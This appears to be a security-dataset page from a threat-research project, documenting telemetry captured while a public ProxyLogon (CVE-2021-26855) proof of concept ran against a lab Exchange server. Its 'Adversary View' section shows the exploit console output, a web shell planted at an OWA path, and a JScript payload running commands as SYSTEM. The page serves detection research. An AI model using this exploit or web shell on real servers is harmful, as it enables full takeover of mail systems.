Exchange ProxyLogon SSRF RCE Vuln POC#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2021/03/14

Modification Date

2021/03/14

Tactics

TA0003,TA0002

Techniques

T1505.003

Tags

None

Dataset Description#

This dataset represents the execution of a public POC to abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)

Simulation Metadata#

Tools#

type

Name

Module

Manual

cmd

cmd

Adversary View#

C:\Users\wardog.MXS01\Documents>
C:\Users\wardog.MXS01\Documents>python public-poc.py localhost wardog@azsentinel.local
Attacking target localhost
=============================
Got DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog
Got SID: S-1-5-21-594047938-393122191-2580508586-500
Got session id: e243cd06-1093-40d4-829c-63f3b9caea9b
Got canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.
Got OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4
Ready!

Testing command:
===============
POST  shell:https://localhost/owa/auth/ohyeah.aspx
code":"Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").StdOut.ReadAll());


[*] Waiting for ohyeah.aspx to be available..
[*] Waiting for ohyeah.aspx to be available..

Results:
========
nt authority\system


C:\Users\wardog.MXS01\Documents>

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)